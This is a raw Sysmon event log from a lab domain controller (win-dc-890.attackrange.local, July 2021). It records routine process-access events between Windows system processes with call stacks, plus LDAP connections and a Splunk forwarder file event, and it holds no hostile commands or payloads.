07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:12.207{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001049593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.535{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51053-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.535{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51053-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 
23542300x80000000000000001049591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:12.123{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=521510AD599311377B4DBE2AE420CE2D,SHA256=7B5367F50A436369E3AEA3EF97223D594BE3D387692D8D2CFE82C82CF107C44E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:13.391{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\
